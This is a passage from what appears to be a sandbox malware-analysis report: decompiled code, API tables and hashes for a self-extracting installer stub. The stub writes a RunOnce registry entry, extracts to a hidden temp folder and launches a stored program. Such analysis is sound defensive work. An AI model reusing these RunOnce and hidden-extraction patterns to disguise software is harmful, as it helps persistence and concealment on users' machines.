							_t29 = _t24 - _t24;
							if(_t24 != _t24) {
								_t17 = 4;
								asm("int 0x29");
							}
						}
					}
				}
				_t20 = _a12;
				_t18 = _a4;
				 *0x8e9124 = 0;
				if(E008E2CAA(_a4, _a12, _t29, _t17) != 0) {
					_t9 = E008E2F1D(_t18, _t20); // executed
					_t22 = _t9; // executed
					E008E52B6(0, _t18, _t21, _t22); // executed
					if(_t22 != 0) {
						_t32 =  *0x8e8a3a; // 0x0
						if(_t32 == 0) {
							_t19 =  *0x8e9a2c; // 0x0
							if((_t19 & 0x00000001) != 0) {
								E008E1F90(_t19, _t21, _t22);
							}
						}
					}
				}
				_t6 =  *0x8e8588; // 0x0
				if(_t6 != 0) {
					CloseHandle(_t6);
				}
				_t7 =  *0x8e9124; // 0x80070002
				return _t7;
			}

0x008e2c03
0x008e2c0d
0x008e2c18
0x008e2c20
0x008e2c2e
0x008e2c32
0x008e2c36
0x008e2c3d
0x008e2c43
0x008e2c45
0x008e2c47
0x008e2c49
0x008e2c4e
0x008e2c4e
0x008e2c47
0x008e2c32
0x008e2c20
0x008e2c50
0x008e2c54
0x008e2c57
0x008e2c64
0x008e2c66
0x008e2c6b
0x008e2c6d
0x008e2c74
0x008e2c76
0x008e2c7c
0x008e2c7e
0x008e2c87
0x008e2c89
0x008e2c89
0x008e2c87
0x008e2c7c
0x008e2c74
0x008e2c8e
0x008e2c95
0x008e2c98
0x008e2c98
0x008e2c9e
0x008e2ca7

APIs

GetVersion.KERNEL32(?,00000002,00000000,?,008E6BB0,008E0000,00000000,00000002,0000000A), ref: 008E2C03
GetModuleHandleW.KERNEL32(Kernel32.dll,?,008E6BB0,008E0000,00000000,00000002,0000000A), ref: 008E2C18
GetProcAddress.KERNEL32(00000000,HeapSetInformation), ref: 008E2C28
CloseHandle.KERNEL32(00000000,?,?,008E6BB0,008E0000,00000000,00000002,0000000A), ref: 008E2C98

Strings

HeapSetInformation, xrefs: 008E2C22
Kernel32.dll, xrefs: 008E2C13

Memory Dump Source

Source File: 00000001.00000002.335529120.00000000008E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000001.00000002.335523203.00000000008E0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.335537425.00000000008E8000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.335543262.00000000008EA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.335543262.00000000008EC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_8e0000_kino5628.jbxd

Similarity

API ID: Handle$AddressCloseModuleProcVersion
String ID: HeapSetInformation$Kernel32.dll
API String ID: 62482547-3460614246
Opcode ID: 13727eb11bf24e56f3cb4ac883e10c086c3a93f298eb02f48d27ee9e79d9a7ce
Instruction ID: 24c0c8be3d0dd0478d17af2d2583998480aaa6c72b0ff2b0160f5543716dec76
Opcode Fuzzy Hash: 13727eb11bf24e56f3cb4ac883e10c086c3a93f298eb02f48d27ee9e79d9a7ce
Instruction Fuzzy Hash: 831148312003C59BCB24ABBBECC8A2F375DFB86780B240025F945EB250DE74EC01C662

Uniqueness

Uniqueness Score: -1.00%

Function 008E6F40 Relevance: 1.5, APIs: 1, Instructions: 4
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E008E6F40() {

				SetUnhandledExceptionFilter(E008E6EF0); // executed
				return 0;
			}

0x008e6f45
0x008e6f4d

APIs

SetUnhandledExceptionFilter.KERNELBASE(Function_00006EF0), ref: 008E6F45

Memory Dump Source

Source File: 00000001.00000002.335529120.00000000008E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000001.00000002.335523203.00000000008E0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.335537425.00000000008E8000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.335543262.00000000008EA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.335543262.00000000008EC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_8e0000_kino5628.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 3e0126cd8bdc218dd488e03445dc6248e0284312ef9070f07e451f60627d3029
Instruction ID: 2103fe05dfb1d1a37ddc0330d41de51f1b377cd8fb564f0a854000bb7d5affe3
Opcode Fuzzy Hash: 3e0126cd8bdc218dd488e03445dc6248e0284312ef9070f07e451f60627d3029
Instruction Fuzzy Hash: 789002642551C14796141B71DD594257991BA5FA42B915460B422C85D4EB6450505512

Uniqueness

Uniqueness Score: -1.00%

Function 008E202A Relevance: 42.2, APIs: 16, Strings: 8, Instructions: 185
registrylibrarymemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 93%

			E008E202A(struct HINSTANCE__* __edx) {
				signed int _v8;
				char _v268;
				char _v528;
				void* _v532;
				int _v536;
				int _v540;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t28;
				long _t36;
				long _t41;
				struct HINSTANCE__* _t46;
				intOrPtr _t49;
				intOrPtr _t50;
				CHAR* _t54;
				void _t56;
				signed int _t66;
				intOrPtr* _t72;
				void* _t73;
				void* _t75;
				void* _t80;
				intOrPtr* _t81;
				void* _t86;
				void* _t87;
				void* _t90;
				_Unknown_base(*)()* _t91;
				signed int _t93;
				void* _t94;
				void* _t95;

				_t79 = __edx;
				_t28 =  *0x8e8004; // 0xaf179a30
				_v8 = _t28 ^ _t93;
				_t84 = 0x104;
				memset( &_v268, 0, 0x104);
				memset( &_v528, 0, 0x104);
				_t95 = _t94 + 0x18;
				_t66 = 0;
				_t36 = RegCreateKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0, 0, 0x2001f, 0,  &_v532,  &_v536); // executed
				if(_t36 != 0) {
					L24:
					return E008E6CE0(_t36, _t66, _v8 ^ _t93, _t79, _t84, _t86);
				}
				_push(_t86);
				_t87 = 0;
				while(1) {
					E008E171E("wextract_cleanup1", 0x50, "wextract_cleanup%d", _t87);
					_t95 = _t95 + 0x10;
					_t41 = RegQueryValueExA(_v532, "wextract_cleanup1", 0, 0, 0,  &_v540); // executed
					if(_t41 != 0) {
						break;
					}
					_t87 = _t87 + 1;
					if(_t87 < 0xc8) {
						continue;
					}
					break;
				}
				if(_t87 != 0xc8) {
					GetSystemDirectoryA( &_v528, _t84);
					_t79 = _t84;
					E008E658A( &_v528, _t84, "advpack.dll");
					_t46 = LoadLibraryA( &_v528); // executed
					_t84 = _t46;
					if(_t84 == 0) {
						L10:
						if(GetModuleFileNameA( *0x8e9a3c,  &_v268, 0x104) == 0) {
							L17:
							_t36 = RegCloseKey(_v532);
							L23:
							_pop(_t86);
							goto L24;
						}
						L11:
						_t72 =  &_v268;
						_t80 = _t72 + 1;
						do {
							_t49 =  *_t72;
							_t72 = _t72 + 1;
						} while (_t49 != 0);
						_t73 = _t72 - _t80;
						_t81 = 0x8e91e4;
						do {
							_t50 =  *_t81;
							_t81 = _t81 + 1;
						} while (_t50 != 0);
						_t84 = _t73 + 0x50 + _t81 - 0x8e91e5;
						_t90 = LocalAlloc(0x40, _t73 + 0x50 + _t81 - 0x8e91e5);
						if(_t90 != 0) {
							 *0x8e8580 = _t66 ^ 0x00000001;
							_t54 = "rundll32.exe %sadvpack.dll,DelNodeRunDLL32 \"%s\"";
							if(_t66 == 0) {
								_t54 = "%s /D:%s";
							}
							_push("C:\Users\hardz\AppData\Local\Temp\IXP001.TMP\");
							E008E171E(_t90, _t84, _t54,  &_v268);
							_t75 = _t90;
							_t23 = _t75 + 1; // 0x1
							_t79 = _t23;
							do {
								_t56 =  *_t75;
								_t75 = _t75 + 1;
							} while (_t56 != 0);
							_t24 = _t75 - _t79 + 1; // 0x2
							RegSetValueExA(_v532, "wextract_cleanup1", 0, 1, _t90, _t24); // executed
							RegCloseKey(_v532); // executed
							_t36 = LocalFree(_t90);
							goto L23;
						}
						_t79 = 0x4b5;
						E008E44B9(0, 0x4b5, _t51, _t51, 0x10, _t51);
						goto L17;
					}
					_t91 = GetProcAddress(_t84, "DelNodeRunDLL32");
					_t66 = 0 | _t91 != 0x00000000;
					FreeLibrary(_t84); // executed
					if(_t91 == 0) {
						goto L10;
					}
					if(GetSystemDirectoryA( &_v268, 0x104) != 0) {
						E008E658A( &_v268, 0x104, 0x8e1140);
					}
					goto L11;
				}
				_t36 = RegCloseKey(_v532);
				 *0x8e8530 = _t66;
				goto L23;
			}

0x008e202a
0x008e2035
0x008e203c
0x008e2041
0x008e2050
0x008e205f
0x008e2064
0x008e206f
0x008e208c
0x008e2094
0x008e2257
0x008e2266
0x008e2266
0x008e209a
0x008e209b
0x008e209d
0x008e20aa
0x008e20af
0x008e20c9
0x008e20d1
0x00000000
0x00000000
0x008e20d3
0x008e20da
0x00000000
0x00000000
0x00000000
0x008e20da
0x008e20e2
0x008e2103
0x008e210e
0x008e2116
0x008e2122
0x008e2128
0x008e212c
0x008e2179
0x008e2194
0x008e21de
0x008e21e4
0x008e2256
0x008e2256
0x00000000
0x008e2256
0x008e2196
0x008e2196
0x008e219c
0x008e219f
0x008e219f
0x008e21a1
0x008e21a2
0x008e21a6
0x008e21a8
0x008e21b0
0x008e21b0
0x008e21b2
0x008e21b3
0x008e21bc
0x008e21c7
0x008e21cb
0x008e21f1
0x008e21f6
0x008e21fd
0x008e21ff
0x008e21ff
0x008e2204
0x008e2213
0x008e2218
0x008e221d
0x008e221d
0x008e2220
0x008e2220
0x008e2222
0x008e2223
0x008e2229
0x008e223d
0x008e2249
0x008e2250
0x00000000
0x008e2250
0x008e21d2
0x008e21d9
0x00000000
0x008e21d9
0x008e213a
0x008e2141
0x008e2144
0x008e214c
0x00000000
0x00000000
0x008e2163
0x008e2172
0x008e2172
0x00000000
0x008e2163
0x008e20ea
0x008e20f0
0x00000000

APIs

memset.MSVCRT ref: 008E2050
memset.MSVCRT ref: 008E205F
RegCreateKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,00000000,00000000,0002001F,00000000,?,?,?,?,?,?,00000000,00000000), ref: 008E208C

Part of subcall function 008E171E: _vsnprintf.MSVCRT ref: 008E1750

RegQueryValueExA.KERNELBASE(?,wextract_cleanup1,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 008E20C9
RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 008E20EA
GetSystemDirectoryA.KERNEL32 ref: 008E2103
LoadLibraryA.KERNELBASE(?,advpack.dll,?,?,?,?,?,?,?,?,00000000,00000000), ref: 008E2122
GetProcAddress.KERNEL32(00000000,DelNodeRunDLL32), ref: 008E2134
FreeLibrary.KERNELBASE(00000000,?,?,?,?,?,?,?,?,00000000,00000000), ref: 008E2144
GetSystemDirectoryA.KERNEL32 ref: 008E215B
GetModuleFileNameA.KERNEL32(?,00000104,?,?,?,?,?,?,?,?,00000000,00000000), ref: 008E218C
LocalAlloc.KERNEL32(00000040,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 008E21C1
RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 008E21E4
RegSetValueExA.KERNELBASE(?,wextract_cleanup1,00000000,00000001,00000000,00000002,?,?,?,?,?,?,?,?,?), ref: 008E223D
RegCloseKey.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 008E2249
LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 008E2250

Strings

C:\Users\user\AppData\Local\Temp\IXP001.TMP\, xrefs: 008E21A8, 008E2204
Software\Microsoft\Windows\CurrentVersion\RunOnce, xrefs: 008E2082
advpack.dll, xrefs: 008E2109
wextract_cleanup1, xrefs: 008E20A5, 008E20BE, 008E20F0, 008E2232
DelNodeRunDLL32, xrefs: 008E212E
wextract_cleanup%d, xrefs: 008E209E
rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s", xrefs: 008E21F6
%s /D:%s, xrefs: 008E21FF, 008E2210

Memory Dump Source

Source File: 00000001.00000002.335529120.00000000008E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000001.00000002.335523203.00000000008E0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.335537425.00000000008E8000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.335543262.00000000008EA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.335543262.00000000008EC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_8e0000_kino5628.jbxd

Similarity

API ID: Close$DirectoryFreeLibraryLocalSystemValuememset$AddressAllocCreateFileLoadModuleNameProcQuery_vsnprintf
String ID: %s /D:%s$C:\Users\user\AppData\Local\Temp\IXP001.TMP\$DelNodeRunDLL32$Software\Microsoft\Windows\CurrentVersion\RunOnce$advpack.dll$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup%d$wextract_cleanup1
API String ID: 178549006-850274211
Opcode ID: c2db60ed7e997779deb40f8780110352710db98a9311b596d5408f47c2381a80
Instruction ID: 628c3250dd3eb4080276c2014c098dfe6b90b3ab1c2bde4895dae4af976b7389
Opcode Fuzzy Hash: c2db60ed7e997779deb40f8780110352710db98a9311b596d5408f47c2381a80
Instruction Fuzzy Hash: 4C511871A00294EBDB249B66DC89FFA773CFB52B00F0001A4FA59EB150DA75AE49CA51

Uniqueness

Uniqueness Score: -1.00%

Function 008E55A0 Relevance: 31.7, APIs: 12, Strings: 6, Instructions: 248
memorystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 92%

			E008E55A0(void* __eflags) {
				signed int _v8;
				char _v265;
				char _v268;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t28;
				int _t32;
				int _t33;
				int _t35;
				signed int _t36;
				signed int _t38;
				int _t40;
				int _t44;
				long _t48;
				int _t49;
				int _t50;
				signed int _t53;
				int _t54;
				int _t59;
				char _t60;
				int _t65;
				char _t66;
				int _t67;
				int _t68;
				int _t69;
				int _t70;
				int _t71;
				struct _SECURITY_ATTRIBUTES* _t72;
				int _t73;
				CHAR* _t82;
				CHAR* _t88;
				void* _t103;
				signed int _t110;

				_t28 =  *0x8e8004; // 0xaf179a30
				_v8 = _t28 ^ _t110;
				_t2 = E008E468F("RUNPROGRAM", 0, 0) + 1; // 0x1
				_t109 = LocalAlloc(0x40, _t2);
				if(_t109 != 0) {
					_t82 = "RUNPROGRAM";
					_t32 = E008E468F(_t82, _t109, 1);
					__eflags = _t32;
					if(_t32 != 0) {
						_t33 = lstrcmpA(_t109, "<None>");
						__eflags = _t33;
						if(_t33 == 0) {
							 *0x8e9a30 = 1;
						}
						LocalFree(_t109);
						_t35 =  *0x8e8b3e; // 0x0
						__eflags = _t35;
						if(_t35 == 0) {
							__eflags =  *0x8e8a24; // 0x0
							if(__eflags != 0) {
								L46:
								_t101 = 0x7d2;
								_t36 = E008E6517(_t82, 0x7d2, 0, E008E3210, 0, 0);
								asm("sbb eax, eax");
								_t38 =  ~( ~_t36);
							} else {
								__eflags =  *0x8e9a30; // 0x0
								if(__eflags != 0) {
									goto L46;
								} else {
									_t109 = 0x8e91e4;
									_t40 = GetTempPathA(0x104, 0x8e91e4);
									__eflags = _t40;
									if(_t40 == 0) {
										L19:
										_push(_t82);
										E008E1781( &_v268, 0x104, _t82, "A:\\");
										__eflags = _v268 - 0x5a;
										if(_v268 <= 0x5a) {
											do {
												_t109 = GetDriveTypeA( &_v268);
												__eflags = _t109 - 6;
												if(_t109 == 6) {
													L22:
													_t48 = GetFileAttributesA( &_v268);
													__eflags = _t48 - 0xffffffff;
													if(_t48 != 0xffffffff) {
														goto L30;
													} else {
														goto L23;
													}
												} else {
													__eflags = _t109 - 3;
													if(_t109 != 3) {
														L23:
														__eflags = _t109 - 2;
														if(_t109 != 2) {
															L28:
															_t66 = _v268;
															goto L29;
														} else {
															_t66 = _v268;
															__eflags = _t66 - 0x41;
															if(_t66 == 0x41) {
																L29:
																_t60 = _t66 + 1;
																_v268 = _t60;
																goto L42;
															} else {
																__eflags = _t66 - 0x42;
																if(_t66 == 0x42) {
																	goto L29;
																} else {
																	_t68 = E008E6952( &_v268);
																	__eflags = _t68;
																	if(_t68 == 0) {
																		goto L28;
																	} else {
																		__eflags = _t68 - 0x19000;
																		if(_t68 >= 0x19000) {
																			L30:
																			_push(0);
																			_t103 = 3;
																			_t49 = E008E597D( &_v268, _t103, 1);
																			__eflags = _t49;
																			if(_t49 != 0) {
																				L33:
																				_t50 = E008E2630(0,  &_v268, 1);
																				__eflags = _t50;
																				if(_t50 != 0) {
																					GetWindowsDirectoryA( &_v268, 0x104);
																				}
																				_t88 =  &_v268;
																				E008E658A(_t88, 0x104, "msdownld.tmp");
																				_t53 = GetFileAttributesA( &_v268);
																				__eflags = _t53 - 0xffffffff;
																				if(_t53 != 0xffffffff) {
																					_t54 = _t53 & 0x00000010;
																					__eflags = _t54;
																				} else {
																					_t54 = CreateDirectoryA( &_v268, 0);
																				}
																				__eflags = _t54;
																				if(_t54 != 0) {
																					SetFileAttributesA( &_v268, 2);
																					_push(_t88);
																					_t109 = 0x8e91e4;
																					E008E1781(0x8e91e4, 0x104, _t88,  &_v268);
																					_t101 = 1;
																					_t59 = E008E5467(0x8e91e4, 1, 0);
																					__eflags = _t59;
																					if(_t59 != 0) {
																						goto L45;
																					} else {
																						_t60 = _v268;
																						goto L42;
																					}
																				} else {
																					_t60 = _v268 + 1;
																					_v265 = 0;
																					_v268 = _t60;
																					goto L42;
																				}
																			} else {
																				_t65 = E008E2630(0,  &_v268, 1);
																				__eflags = _t65;
																				if(_t65 != 0) {
																					goto L28;
																				} else {
																					_t67 = E008E597D( &_v268, 1, 1, 0);
																					__eflags = _t67;
																					if(_t67 == 0) {
																						goto L28;
																					} else {
																						goto L33;
																					}
																				}
																			}
																		} else {
																			goto L28;
																		}
																	}
																}
															}
														}
													} else {
														goto L22;
													}
												}
												goto L47;
												L42:
												__eflags = _t60 - 0x5a;
											} while (_t60 <= 0x5a);
										}
										goto L43;
									} else {
										_t101 = 1;
										_t69 = E008E5467(0x8e91e4, 1, 3); // executed
										__eflags = _t69;
										if(_t69 != 0) {
											goto L45;
										} else {
											_t82 = 0x8e91e4;
											_t70 = E008E2630(0, 0x8e91e4, 1);
											__eflags = _t70;
											if(_t70 != 0) {
												goto L19;
											} else {
												_t101 = 1;
												_t82 = 0x8e91e4;
												_t71 = E008E5467(0x8e91e4, 1, 1);
												__eflags = _t71;
												if(_t71 != 0) {
													goto L45;
												} else {
													do {
														goto L19;
														L43:
														GetWindowsDirectoryA( &_v268, 0x104);
														_push(4);
														_t101 = 3;
														_t82 =  &_v268;
														_t44 = E008E597D(_t82, _t101, 1);
														__eflags = _t44;
													} while (_t44 != 0);
													goto L2;
												}
											}
										}
									}
								}
							}
						} else {
							__eflags = _t35 - 0x5c;
							if(_t35 != 0x5c) {
								L10:
								_t72 = 1;
							} else {
								__eflags =  *0x8e8b3f - _t35; // 0x0
								_t72 = 0;
								if(__eflags != 0) {
									goto L10;
								}
							}
							_t101 = 0;
							_t73 = E008E5467(0x8e8b3e, 0, _t72);
							__eflags = _t73;
							if(_t73 != 0) {
								L45:
								_t38 = 1;
							} else {
								_t101 = 0x4be;
								E008E44B9(0, 0x4be, 0, 0, 0x10, 0);
								goto L2;
							}
						}
					} else {
						_t101 = 0x4b1;
						E008E44B9(0, 0x4b1, 0, 0, 0x10, 0);
						LocalFree(_t109);
						 *0x8e9124 = 0x80070714;
						goto L2;
					}
				} else {
					_t101 = 0x4b5;
					E008E44B9(0, 0x4b5, 0, 0, 0x10, 0);
					 *0x8e9124 = E008E6285();
					L2:
					_t38 = 0;
				}
				L47:
				return E008E6CE0(_t38, 0, _v8 ^ _t110, _t101, 1, _t109);
			}

0x008e55ab
0x008e55b2
0x008e55c9
0x008e55d5
0x008e55d9
0x008e5600
0x008e5605
0x008e560a
0x008e560c
0x008e5638
0x008e5641
0x008e5643
0x008e5645
0x008e5645
0x008e564c
0x008e5652
0x008e5657
0x008e5659
0x008e5696
0x008e569c
0x008e589f
0x008e58a7
0x008e58ac
0x008e58b3
0x008e58b5
0x008e56a2
0x008e56a2
0x008e56a8
0x00000000
0x008e56ae
0x008e56ae
0x008e56b9
0x008e56bf
0x008e56c1
0x008e56f3
0x008e56f3
0x008e5705
0x008e570a
0x008e5711
0x008e5717
0x008e5724
0x008e5726
0x008e5729
0x008e5730
0x008e5737
0x008e573d
0x008e5740
0x00000000
0x00000000
0x00000000
0x00000000
0x008e572b
0x008e572b
0x008e572e
0x008e5742
0x008e5742
0x008e5745
0x008e576b
0x008e576b
0x00000000
0x008e5747
0x008e5747
0x008e574d
0x008e574f
0x008e5771
0x008e5771
0x008e5773
0x00000000
0x008e5751
0x008e5751
0x008e5753
0x00000000
0x008e5755
0x008e575b
0x008e5760
0x008e5762
0x00000000
0x008e5764
0x008e5764
0x008e5769
0x008e577e
0x008e577e
0x008e5781
0x008e5788
0x008e578d
0x008e578f
0x008e57b2
0x008e57b8
0x008e57bd
0x008e57bf
0x008e57cd
0x008e57cd
0x008e57dd
0x008e57e3
0x008e57ef
0x008e57f5
0x008e57f8
0x008e580a
0x008e580a
0x008e57fa
0x008e5802
0x008e5802
0x008e580d
0x008e580f
0x008e5830
0x008e5836
0x008e583d
0x008e584b
0x008e5851
0x008e5855
0x008e585a
0x008e585c
0x00000000
0x008e585e
0x008e585e
0x00000000
0x008e585e
0x008e5811
0x008e5817
0x008e5819
0x008e581f
0x00000000
0x008e581f
0x008e5791
0x008e5797
0x008e579c
0x008e579e
0x00000000
0x008e57a0
0x008e57a9
0x008e57ae
0x008e57b0
0x00000000
0x00000000
0x00000000
0x00000000
0x008e57b0
0x008e579e
0x00000000
0x00000000
0x00000000
0x008e5769
0x008e5762
0x008e5753
0x008e574f
0x00000000
0x00000000
0x00000000
0x008e572e
0x00000000
0x008e5864
0x008e5864
0x008e5864
0x008e5717
0x00000000
0x008e56c3
0x008e56c5
0x008e56c9
0x008e56ce
0x008e56d0
0x00000000
0x008e56d6
0x008e56d6
0x008e56d8
0x008e56dd
0x008e56df
0x00000000
0x008e56e1
0x008e56e2
0x008e56e4
0x008e56e6
0x008e56eb
0x008e56ed
0x00000000
0x008e56f3
0x008e56f3
0x00000000
0x008e586c
0x008e5878
0x008e587e
0x008e5882
0x008e5883
0x008e5889
0x008e588e
0x008e588e
0x00000000
0x008e5896
0x008e56ed
0x008e56df
0x008e56d0
0x008e56c1
0x008e56a8
0x008e565b
0x008e565b
0x008e565d
0x008e5669
0x008e5669
0x008e565f
0x008e565f
0x008e5665
0x008e5667
0x00000000
0x00000000
0x008e5667
0x008e566c
0x008e5673
0x008e5678
0x008e567a
0x008e589b
0x008e589b
0x008e5680
0x008e5685
0x008e568c
0x00000000
0x008e568c
0x008e567a
0x008e560e
0x008e5613
0x008e561a
0x008e5620
0x008e5626
0x00000000
0x008e5626
0x008e55db
0x008e55e0
0x008e55e7
0x008e55f1
0x008e55f6
0x008e55f6
0x008e55f6
0x008e58b7
0x008e58c7

APIs

Part of subcall function 008E468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 008E46A0
Part of subcall function 008E468F: SizeofResource.KERNEL32(00000000,00000000,?,008E2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 008E46A9
Part of subcall function 008E468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 008E46C3
Part of subcall function 008E468F: LoadResource.KERNEL32(00000000,00000000,?,008E2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 008E46CC
Part of subcall function 008E468F: LockResource.KERNEL32(00000000,?,008E2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 008E46D3
Part of subcall function 008E468F: memcpy_s.MSVCRT ref: 008E46E5
Part of subcall function 008E468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 008E46EF

LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000), ref: 008E55CF
lstrcmpA.KERNEL32(00000000,<None>,00000000), ref: 008E5638
LocalFree.KERNEL32(00000000), ref: 008E564C
LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000,00000000), ref: 008E5620

Part of subcall function 008E44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 008E4518
Part of subcall function 008E44B9: MessageBoxA.USER32(?,?,doza2,00010010), ref: 008E4554

Part of subcall function 008E6285: GetLastError.KERNEL32(008E5BBC), ref: 008E6285

GetTempPathA.KERNEL32(00000104,C:\Users\user\AppData\Local\Temp\IXP001.TMP\), ref: 008E56B9
GetDriveTypeA.KERNEL32(0000005A,?,A:\), ref: 008E571E
GetFileAttributesA.KERNEL32(0000005A,?,A:\), ref: 008E5737
GetWindowsDirectoryA.KERNEL32(0000005A,00000104,00000000,?,A:\), ref: 008E57CD
GetFileAttributesA.KERNEL32(0000005A,msdownld.tmp,00000000,?,A:\), ref: 008E57EF
CreateDirectoryA.KERNEL32(0000005A,00000000,?,A:\), ref: 008E5802

Part of subcall function 008E2630: GetWindowsDirectoryA.KERNEL32(?,00000104,00000000), ref: 008E2654

SetFileAttributesA.KERNEL32(0000005A,00000002,?,A:\), ref: 008E5830

Part of subcall function 008E6517: FindResourceA.KERNEL32(008E0000,000007D6,00000005), ref: 008E652A
Part of subcall function 008E6517: LoadResource.KERNEL32(008E0000,00000000,?,?,008E2EE8,00000000,008E19E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 008E6538
Part of subcall function 008E6517: DialogBoxIndirectParamA.USER32(008E0000,00000000,00000547,008E19E0,00000000), ref: 008E6557
Part of subcall function 008E6517: FreeResource.KERNEL32(00000000,?,?,008E2EE8,00000000,008E19E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 008E6560

GetWindowsDirectoryA.KERNEL32(0000005A,00000104,?,A:\), ref: 008E5878

Part of subcall function 008E597D: GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,00000000), ref: 008E59A8
Part of subcall function 008E597D: SetCurrentDirectoryA.KERNELBASE(?), ref: 008E59AF

Strings

C:\Users\user\AppData\Local\Temp\IXP001.TMP\, xrefs: 008E56AE, 008E56B3, 008E583D
Z, xrefs: 008E570A
RUNPROGRAM, xrefs: 008E55BD, 008E5600
A:\, xrefs: 008E56F4
<None>, xrefs: 008E5632
msdownld.tmp, xrefs: 008E57D3

Memory Dump Source

Source File: 00000001.00000002.335529120.00000000008E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000001.00000002.335523203.00000000008E0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.335537425.00000000008E8000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.335543262.00000000008EA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.335543262.00000000008EC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_8e0000_kino5628.jbxd

Similarity

API ID: Resource$Directory$Free$AttributesFileFindLoadLocalWindows$Current$AllocCreateDialogDriveErrorIndirectLastLockMessageParamPathSizeofStringTempTypelstrcmpmemcpy_s
String ID: <None>$A:\$C:\Users\user\AppData\Local\Temp\IXP001.TMP\$RUNPROGRAM$Z$msdownld.tmp
API String ID: 2436801531-337015389
Opcode ID: 14b35585a0f07b0aa7e8120f6efbbc54d67f43f45266e3ac193fe29329396540
Instruction ID: 6ed0f4c3b1bff3fe6f136466feea120231e512139c0c52d2240d280d9407d6c8
Opcode Fuzzy Hash: 14b35585a0f07b0aa7e8120f6efbbc54d67f43f45266e3ac193fe29329396540
Instruction Fuzzy Hash: EC814A70A04AD49ADB24AB778C85BEF775DFB63708F000075F58AD6191EFB48EC18A11

Uniqueness

Uniqueness Score: -1.00%

Function 008E597D Relevance: 19.7, APIs: 13, Instructions: 212
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 96%

			E008E597D(CHAR* __ecx, signed char __edx, void* __edi, intOrPtr _a4) {
				signed int _v8;
				char _v16;
				char _v276;
				char _v788;
				long _v792;
				long _v796;
				long _v800;
				signed int _v804;
				long _v808;
				int _v812;
				long _v816;
				long _v820;
				void* __ebx;
				void* __esi;
				signed int _t46;
				int _t50;
				signed int _t55;
				void* _t66;
				int _t69;
				signed int _t73;
				signed short _t78;
				signed int _t87;
				signed int _t101;
				int _t102;
				unsigned int _t103;
				unsigned int _t105;
				signed int _t111;
				long _t112;
				signed int _t116;
				CHAR* _t118;
				signed int _t119;
				signed int _t120;

				_t114 = __edi;
				_t46 =  *0x8e8004; // 0xaf179a30
				_v8 = _t46 ^ _t120;
				_v804 = __edx;
				_t118 = __ecx;
				GetCurrentDirectoryA(0x104,  &_v276);
				_t50 = SetCurrentDirectoryA(_t118); // executed
				if(_t50 != 0) {
					_push(__edi);
					_v796 = 0;
					_v792 = 0;
					_v800 = 0;
					_v808 = 0;
					_t55 = GetDiskFreeSpaceA(0,  &_v796,  &_v792,  &_v800,  &_v808); // executed
					__eflags = _t55;
					if(_t55 == 0) {
						L29:
						memset( &_v788, 0, 0x200);
						 *0x8e9124 = E008E6285();
